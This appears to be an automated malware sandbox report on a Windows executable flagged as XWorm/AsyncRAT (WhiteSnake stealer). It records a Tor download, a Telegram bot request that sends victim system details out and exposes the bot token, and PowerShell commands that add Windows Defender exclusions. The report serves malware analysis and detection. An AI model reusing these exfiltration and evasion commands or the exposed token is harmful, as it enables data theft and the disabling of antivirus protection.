                                                                          Data Ascii: Pjd&z$RJTD5;Yf.pnlm]5}u+}odmAfBo\ZDji}e_l=wpi,/rV/9;wek_UPkVzdSk=6m}Preo|3q|Gz6d7&O


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.549718140.82.121.34435624C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-07-23 13:47:02 UTC132OUTGET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1
                                                                          Host: github.com
                                                                          Connection: Keep-Alive
                                                                          2024-07-23 13:47:03 UTC1016INHTTP/1.1 302 Found
                                                                          Server: GitHub.com
                                                                          Date: Tue, 23 Jul 2024 13:47:02 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                          Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240723%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240723T134702Z&X-Amz-Expires=300&X-Amz-Signature=684cb43c3b728dcd5e6fa405bf9e25ff74f8774c26110905339a58889403f8fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream
                                                                          Cache-Control: no-cache
                                                                          Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                          X-Frame-Options: deny
                                                                          X-Content-Type-Options: nosniff
                                                                          X-XSS-Protection: 0
                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                          2024-07-23 13:47:03 UTC3086INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                          Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                          2024-07-23 13:47:03 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                          Data Ascii: connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.549719185.199.108.1334435624C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-07-23 13:47:03 UTC607OUTGET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240723%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240723T134702Z&X-Amz-Expires=300&X-Amz-Signature=684cb43c3b728dcd5e6fa405bf9e25ff74f8774c26110905339a58889403f8fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                          Host: objects.githubusercontent.com
                                                                          Connection: Keep-Alive
                                                                          2024-07-23 13:47:03 UTC835INHTTP/1.1 200 OK
                                                                          Connection: close
                                                                          Content-Length: 6710958
                                                                          Content-Type: application/octet-stream
                                                                          Content-MD5: 9OeRN6tLfAr39BD4dWG/Iw==
                                                                          Last-Modified: Thu, 27 Jan 2022 16:21:05 GMT
                                                                          ETag: "0x8D9E1B104D9C2C4"
                                                                          Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                          x-ms-request-id: cb0134c4-b01e-0062-6136-dc2372000000
                                                                          x-ms-version: 2020-10-02
                                                                          x-ms-creation-time: Thu, 27 Jan 2022 16:21:05 GMT
                                                                          x-ms-lease-status: unlocked
                                                                          x-ms-lease-state: available
                                                                          x-ms-blob-type: BlockBlob
                                                                          Content-Disposition: attachment; filename=tor-expert-bundle-v0.4.5.10.zip
                                                                          x-ms-server-encrypted: true
                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                          Accept-Ranges: bytes
                                                                          Age: 0
                                                                          Date: Tue, 23 Jul 2024 13:47:03 GMT
                                                                          X-Served-By: cache-iad-kcgs7200078-IAD, cache-nyc-kteb1890061-NYC
                                                                          X-Cache: HIT, MISS
                                                                          X-Cache-Hits: 115, 0
                                                                          X-Timer: S1721742424.628878,VS0,VE50
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: 50 4b 03 04 14 00 00 00 08 00 40 9b 10 53 2c f6 1c 9f 95 e7 05 00 94 e5 10 00 0e 00 00 00 6c 69 62 73 73 6c 2d 31 5f 31 2e 64 6c 6c ec fd 0b 74 14 55 12 38 0e 77 cf 74 c2 04 06 7a d4 01 83 66 25 68 ab 89 44 cd 68 d4 8c 04 0d 49 48 22 44 88 12 81 15 54 54 44 1e 59 45 9c 01 d4 2c 04 7a 26 a4 6d 07 a3 e0 1b 5f ab bb 8b 8b ba ec aa bc d5 3c 80 80 cf 88 22 ac f8 60 15 b5 c7 80 82 28 84 57 e6 7f ab ea 76 4f cf 24 ac fe 7e e7 fb 9f f3 7d e7 7c 9c 43 a6 bb ef ab 6e dd ba 75 eb d6 ad aa 7b f5 f5 0d 82 53 10 04 89 fd 8f c5 04 61 b5 40 ff 0a 85 df fe 57 cb fe f7 19 b0 b6 8f f0 7a da fb 03 57 8b 15 ef 0f ac 9a 32 f5 ee cc 19 33 ef bc 7d e6 cd 7f ca bc f5 e6 3b ee b8 33 90 79 cb 6d 99 33 83 77 64 4e bd 23 b3 64 d4 e8 cc 3f dd 39 e9 b6 0b 7a f7 ee a9 f0 3a 2a 87 09 42
                                                                          Data Ascii: PK@S,libssl-1_1.dlltU8wtzf%hDhIH"DTTDYE,z&m_<"`(WvO$~}|Cnu{Sa@WzW23};3ym3wdN#d?9z:*B
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: e2 4a 86 41 ad c5 1c 17 e3 95 67 78 d5 0c af ff 82 e7 3c a8 44 02 6a 33 a6 02 f4 1b 14 3e 6d 5b 38 1f 63 28 1d 42 bf 6e ac 9e 35 39 94 de a5 59 c4 6f 32 a1 e2 82 a7 b0 30 f5 9a 21 ec 3a c6 30 7d 3b d5 3d 39 0c b6 12 bd 46 29 0c 1f 0c dc a9 15 28 46 0b 6b 55 47 66 22 c3 f8 16 28 ac 97 19 c6 5e f8 5a a2 54 30 34 49 5a 0e 7c 73 b3 d7 72 c0 80 f1 af ef 44 81 be 49 5a 8b b1 f8 0f 0e 41 db a4 76 b8 66 bb d9 90 67 c4 94 b0 87 81 d5 e0 3b 48 f0 62 05 ac 99 d7 9f 06 78 72 b4 1d 7c fe e8 c3 5d e1 2d 72 e8 4d 41 c0 76 74 c1 59 e4 d6 8a dc fe 26 59 7d 09 c8 a9 48 12 5b 8b 50 dc 60 4d 19 af fe 22 0a ed af 43 3f 00 d0 34 f6 d5 77 10 6a 9d c5 6a 6d 5f 6a 7e ef 69 7d bf 11 be 87 cc ef 50 0d 2d 09 2c a9 98 25 45 27 5b 7c cc 4a 77 f0 f4 b3 20 bd b4 6b ba 93 a7 3b 21 fd 1c
                                                                          Data Ascii: JAgx<Dj3>m[8c(Bn59Yo20!:0};=9F)(FkUGf"(^ZT04IZ|srDIZAvfg;Hbxr|]-rMAvtY&Y}H[P`M"C?4wjjm_j~i}P-,%E'[|Jw k;!
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: 10 8f 1a 6f 8a b5 29 fb 19 d7 6a 45 39 95 bd 9d ca ba c2 50 ec 06 78 4d 9a fd 13 5f a8 d6 41 59 10 21 d8 f3 85 58 7b a0 2f ed 92 51 de 64 9f 7d 3b 8d 59 4b 88 bd dd b1 84 18 e7 e4 25 20 6b 78 7c 8d 66 b6 86 f8 5b e2 fe 0e e5 79 a3 94 83 ff e3 62 6c 60 b8 d6 62 02 9a 01 43 b2 89 7d eb 07 54 03 6d fc 83 f2 a4 d2 ca 0b 5f 3a 16 53 ab fb 16 a7 08 49 3b 80 86 e4 77 6c 8f 63 c6 98 b7 98 e3 e5 0a b3 b9 bd b0 f6 43 73 65 48 ea 79 a0 75 c8 31 ce 05 d9 37 d0 3d 7e 9e a2 46 41 ac 6a 61 e3 61 bc cb f2 b6 6f b5 e4 11 c2 cf 18 96 a9 fd 3f 80 08 6b ff 02 75 f4 60 ac 16 5a bd 72 71 8a 60 bd b7 60 cb ec 6b 36 74 74 67 60 18 c2 73 25 b4 15 7b d8 5c fd 7f 65 4f fa 29 e1 ad 81 73 71 3d 1d 88 c8 61 33 ec f8 76 9c d9 8f 34 32 90 e4 95 b6 8e 9b 78 e0 fb 1d 26 fc 04 4f 6e 2f 43
                                                                          Data Ascii: o)jE9PxM_AY!X{/Qd};YK% kx|f[ybl`bC}Tm_:SI;wlcCseHyu17=~FAjaao?ku`Zrq``k6ttg`s%{\eO)sq=a3v42x&On/C
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: b1 5b 68 92 2c f1 71 b4 43 98 f7 55 78 cb bc 1c c4 17 b2 8a f6 0f 1b 54 43 9c df 04 08 65 d5 ec 6c 5f d5 e0 7f 08 6a 9e f7 78 fb 97 86 ef fe 14 c1 d7 d8 be bc fb f5 4f 5f 8c 6b ca 82 39 9c a5 b6 2e a8 b1 9e 6a f9 13 5f 77 6a 43 66 4a 6d bd 99 82 02 44 6b 9d 39 39 e6 6f 0a 71 16 3a bd 55 b4 64 d3 e4 59 19 ab 4f 11 cc 75 9c d6 c9 3f a7 d2 3a 79 c9 05 5d d7 81 e7 2f 34 d7 49 be ae 41 39 06 7e 96 3e 41 c9 25 f0 75 04 55 6d 14 35 7c f0 6d 55 3b 1c b3 dd ea 86 2c ad 6d 7c 5c ce 5a 7d 31 32 fe c0 59 66 0b 58 a8 c3 3d 7b 8c 6f ab 99 d7 26 1f 1b ab 37 89 d6 b8 da bb 71 21 ef 46 3e eb 06 b5 ef 5f 00 fc 76 56 aa 86 bf 04 4d fb 5f 59 5e ef 9f 45 d2 99 c3 42 0d 75 e5 d3 bb eb 0a d1 b6 b5 63 6d 55 04 9c c2 5a 78 41 dd 6f b7 fc 7e 02 a3 6f f5 44 f4 bd 0e 19 51 17 3e e2
                                                                          Data Ascii: [h,qCUxTCel_jxO_k9.j_wjCfJmDk99oq:UdYOu?:y]/4IA9~>A%uUm5|mU;,m|\Z}12YfX={o&7q!F>_vVM_Y^EBucmUZxAo~oDQ>
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: 01 11 2d 7a 6e 2c 01 fe 21 49 25 9f ed a6 e4 27 f7 61 c9 bd 5c cf 3b 96 15 69 7f 17 32 b9 38 7a 5f 98 4b 9a d7 d5 8c cc 58 c6 0d 3c 63 46 52 dd e7 75 83 9b 39 54 f7 43 bc 48 4e 52 91 5f ba 01 67 18 15 b9 11 b6 48 6b e6 a1 78 ec 29 07 98 36 11 d1 cb a1 01 74 6a a2 00 f5 6b 1f 45 3b 49 61 ee b9 87 65 8a ca c0 e6 89 42 0b 6b 00 e8 cd 6c 96 31 9a 9e 10 61 bc 9f 14 55 78 e6 50 61 52 e9 32 96 3e bf 46 99 00 2b 98 bc f0 49 98 93 c5 d2 fc 7c 98 50 72 68 04 bc 3a 81 42 60 30 47 94 3a 2c 61 47 6d ec cd 6d 29 60 5d 03 39 a9 06 e4 b9 7a 2f 51 d9 36 06 0b 7c b3 ab 55 4d a5 e1 2f 19 94 e7 5f 0e 3a 92 80 3c 0e 48 b3 d5 d3 c6 f3 44 a0 9e 10 ce 1e c8 e6 4a ca 16 3d 83 b2 4d 8e 37 47 36 2e 2c ed fd d3 28 6d 78 37 a0 38 79 9e a9 bc 99 73 6c 79 9c f6 93 1d d0 8f f1 3c 0e 5b
                                                                          Data Ascii: -zn,!I%'a\;i28z_KX<cFRu9TCHNR_gHkx)6tjkE;IaeBkl1aUxPaR2>F+I|Prh:B`0G:,aGmm)`]9z/Q6|UM/_:<HDJ=M7G6.,(mx78ysly<[
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: b8 4f 81 d6 91 a8 4f 83 fa ae 4d aa ef e6 6e ea 0b b0 fa da 5f a5 fc e3 92 f2 4f eb 26 7f 09 cb 1f bd 2f de 31 d0 5b 91 c1 c8 f0 69 dc 68 ad 43 3b 25 49 bd c7 f7 57 65 ec f1 6d f1 77 34 f2 d5 1d ac 91 73 13 fc 03 80 ff 44 1a 3c 24 95 bb a2 ef c7 35 5c 71 fe 14 69 d8 9d c2 d3 5f e9 92 ce 18 28 a3 db 2c 7d 01 e4 01 3b 0e d2 97 e9 0b da 50 79 14 d8 a7 d7 42 ed 2d 96 de ab a5 2b ff ab 35 52 4c ae b7 7a d7 4d 09 f6 30 ab 27 26 bd ef ba 31 29 3d e9 7d d7 0d 49 e9 49 ef bb 26 24 a5 27 bd ef 1a 9f 94 9e f4 be eb fa a4 f4 a4 f7 5d 7f 4c 4a 4f 7a df 35 2e 29 3d e9 7d d7 d8 a4 f4 a4 f7 5d 63 92 d2 93 de 77 5d 97 94 9e f4 be ab 2a 29 3d e9 7d d7 e8 df c0 f7 84 df e8 ef 8d bf 81 cf 3f fe c6 78 8d 4f 4a ff 2d fc 8c f9 df fd e9 82 df 31 dd e0 27 61 bd d5 36 8d 06 29 65
                                                                          Data Ascii: OOMn_O&/1[ihC;%IWemw4sD<$5\qi_(,};PyB-+5RLzM0'&1)=}II&$']LJOz5.)=}]cw]*)=}?xOJ-1'a6)e
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: 23 f3 f1 2e 3e 30 62 1b 0c d2 09 46 e7 94 db f8 e8 04 2a 92 07 44 5e f8 19 8c 04 0d ca d1 ff 31 28 dd d8 97 fd 5e bc 4e ba 15 bd b5 ba f0 67 db 37 da af 14 7b 00 c7 bc 6b bf 41 71 57 4e b2 28 0e 4e 91 81 bd 66 a2 bf ab 0d 52 58 e0 24 25 99 4c 8c 9a 49 16 8d d8 40 98 25 d8 c6 7b e8 ef 1b ef cf 26 a1 41 f1 63 09 63 bd b6 d3 1c eb 15 36 f5 0f 23 44 b4 3f 29 61 4c 67 82 92 cb 4a 55 5a 23 fc 7f d4 f1 52 86 4d 9c 21 34 a2 a7 99 56 28 b3 84 64 8b 94 df 3b 3e 1b 6e 46 ba 5f 89 fb 91 42 a8 b4 2f a8 65 b4 4a e2 d8 96 3e 20 79 ff 02 c6 cf 60 1a 32 d2 cb b8 ed b5 60 ef ea 1e 34 d4 1d 4c 3d 38 d4 e3 0c 16 e9 7f 74 31 31 6e 10 63 ca 8c 81 96 e8 f7 48 e2 57 91 aa cb 63 8c e1 7f a5 1d c5 79 59 ef 50 7f 40 79 ee 63 92 e7 f4 34 c6 fd d6 92 c6 91 b1 f6 86 f1 be c6 f8 62 01
                                                                          Data Ascii: #.>0bF*D^1(^Ng7{kAqWN(NfRX$%LI@%{&Acc6#D?)aLgJUZ#RM!4V(d;>nF_B/eJ> y`2`4L=8t11ncHWcyYP@yc4b
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: 0b ee 6a 2d e5 72 03 58 64 a3 7f 5d 01 64 f7 72 12 9b 41 84 0e 47 5b c6 9a 71 29 02 df 7f 17 ea c3 25 fd e4 d6 42 3a 65 f5 e8 60 20 57 2e 69 95 2e 46 82 f1 75 e9 54 f3 08 20 89 6e 67 c4 e9 16 0f 0c 77 8c 21 e7 8e f6 a6 c9 36 ff 3e d7 59 66 76 0e f2 1f c7 a5 74 8d df c4 e1 cd 4a 84 d7 85 fb df b1 08 6f 6f 84 c9 3e 9f 06 9d 00 ae bb 92 e0 2a e4 70 d9 2a b0 c3 77 51 12 7c 6b c6 76 03 df 75 63 7d 31 5a 71 ab 51 c3 91 a7 df 00 78 ef d9 7e 23 8f 6b d2 62 99 14 71 27 d8 f3 56 02 d8 f3 ce 61 fb c2 62 b7 f6 15 f8 01 b4 96 12 a2 f7 69 77 bb 61 d9 b4 4d 71 ed 46 26 46 05 4e d2 c0 4a 3e 43 db 67 c9 4f 5a 50 b0 7d 48 d0 c3 26 f0 3b a4 3f 1b 7d 22 7d 81 1a 30 45 2f 77 6b 3d 5b ac f8 58 a4 9f 4d 67 b0 7b da fd 71 fe c2 72 9e a9 7d a5 8f 77 27 74 a3 40 31 6e 7d 03 09 8c
                                                                          Data Ascii: j-rXd]drAG[q)%B:e` W.i.FuT ngw!6>YfvtJoo>*p*wQ|kvuc}1ZqQx~#kbq'VabiwaMqF&FNJ>CgOZP}H&;?}"}0E/wk=[XMg{qr}w't@1n}
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: cc 38 c6 e4 06 2b 1e dd a9 b6 78 74 b5 24 65 41 5e e3 85 91 24 31 2f 06 10 ea 0c 58 b5 5a 8c c9 60 f6 59 9c 69 dc 88 bf 59 c6 98 83 a0 6e ca d4 8a 73 99 80 9b a1 8f 86 a3 a1 be 74 20 d1 18 70 83 42 a3 8d 2b 34 60 c7 f6 38 e4 2e c6 10 3f 11 7c cc 85 c7 05 07 11 45 00 cb b9 bc db 00 87 51 34 12 34 a5 ad d8 b4 a9 1e 69 4b 88 73 97 ce e5 bd da 24 79 ef 3e db fe a9 aa 82 e2 dc 6d a5 b2 16 7d c6 cf 03 0a f5 15 d0 44 7b a9 c9 97 5d 57 d9 c0 80 b3 c5 42 74 81 fc f7 d5 a4 a8 1b 9e 98 0a 49 8f 5d 4d be 4d a7 fe ca 7a 55 8a 46 87 0f 40 af 20 b8 c1 ab ed c3 b8 de cb 55 d9 6d bd d7 f3 7a af e9 5a ef 95 bc de b7 7f 81 7a 11 71 79 dd d4 3b b6 db 7a 1d bc de 71 5d eb fd be 82 ea bd 1d eb c5 51 f8 fc 57 b3 de c8 5c 49 db cf be ea 77 64 a9 df 1f d3 c7 64 66 1f c6 58 02 3b
                                                                          Data Ascii: 8+xt$eA^$1/XZ`YiYnst pB+4`8.?|EQ44iKs$y>m}D{]WBtI]MMzUF@ UmzZzqy;zq]QW\IwddfX;
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: fc cb f4 98 cb 1e 57 d3 a3 7d 47 af ab 40 ac 68 bf 91 82 15 c0 fe 49 5d 8f 3f a7 ca 8f 34 ab 46 3f 46 68 b3 64 9e 02 b4 ba 15 a6 fb cb ca eb f0 ba 37 80 7b d1 b7 53 89 bc 7c 43 9d 58 d7 7e 09 b7 49 0a af a8 9f b9 45 97 97 34 87 63 34 3f e4 47 1a 07 36 d7 57 29 83 1a 5a 8b bd 7c bf 69 3c ef 43 1c f6 d1 5f 03 94 01 f6 2f 74 50 ca f6 37 01 17 f3 3e 86 e7 e5 85 d8 4a f8 35 68 45 c7 9c 10 df 18 94 d6 eb c6 b1 aa f7 43 4b a1 57 60 09 a6 c9 d2 d1 37 d0 b3 55 cd 93 39 ee 47 d7 e8 ff f8 9c a0 4f 53 3b fa c9 e1 23 b0 a5 1d 9d a5 7d aa 7e e7 90 c3 bf b0 6a fd d4 5d 39 94 96 02 e5 bd 72 e8 6f 18 93 b3 af 1c ee 0d 5a 8f c5 d0 6a a4 a8 73 08 1b c0 79 f2 c2 28 0e 29 90 ad 53 05 9a 95 57 4e 11 e5 55 2e c6 03 f2 c1 0c 26 bc 45 30 3d b2 e5 95 20 d8 fb c1 21 3d be ed 35 fd
                                                                          Data Ascii: W}G@hI]?4F?Fhd7{S|CX~IE4c4?G6W)Z|i<C_/tP7>J5hECKW`7U9GOS;#}~j]9roZjsy()SWNU.&E0= !=5


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.549727149.154.167.2204435624C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-07-23 13:47:16 UTC1550OUTGET /bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72% [TRUNCATED]
                                                                          Host: api.telegram.org
                                                                          Connection: Keep-Alive
                                                                          2024-07-23 13:47:16 UTC389INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Tue, 23 Jul 2024 13:47:16 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 1150
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-07-23 13:47:16 UTC1150INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 31 38 35 39 31 33 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 68 69 74 65 53 6e 61 6b 65 20 4c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 53 5f 30 36 66 32 38 35 65 31 66 34 35 30 65 62 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 37 38 33 33 38 34 36 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 61 6b 73 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 6f 70 65 6e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 74 73 72 63 6f 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37
                                                                          Data Ascii: {"ok":true,"result":{"message_id":247,"from":{"id":7418591347,"is_bot":true,"first_name":"WhiteSnake Logs","username":"WS_06f285e1f450eb_bot"},"chat":{"id":6878338460,"first_name":"leaks","last_name":"open","username":"vatsrco","type":"private"},"date":17


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:09:46:32
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\Desktop\yt7dW9nyJK.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\yt7dW9nyJK.exe"
                                                                          Imagebase:0x120000
                                                                          File size:465'416 bytes
                                                                          MD5 hash:ADBE420A49DB30F75D4665EA0014AF43
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:09:46:33
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:09:46:33
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:09:46:33
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\Desktop\yt7dW9nyJK.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\yt7dW9nyJK.exe"
                                                                          Imagebase:0x8e0000
                                                                          File size:465'416 bytes
                                                                          MD5 hash:ADBE420A49DB30F75D4665EA0014AF43
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:6
                                                                          Start time:09:46:37
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:7
                                                                          Start time:09:46:37
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
